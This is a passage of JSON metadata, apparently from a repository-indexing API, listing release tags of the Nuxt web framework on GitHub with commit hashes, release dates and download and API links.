nuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0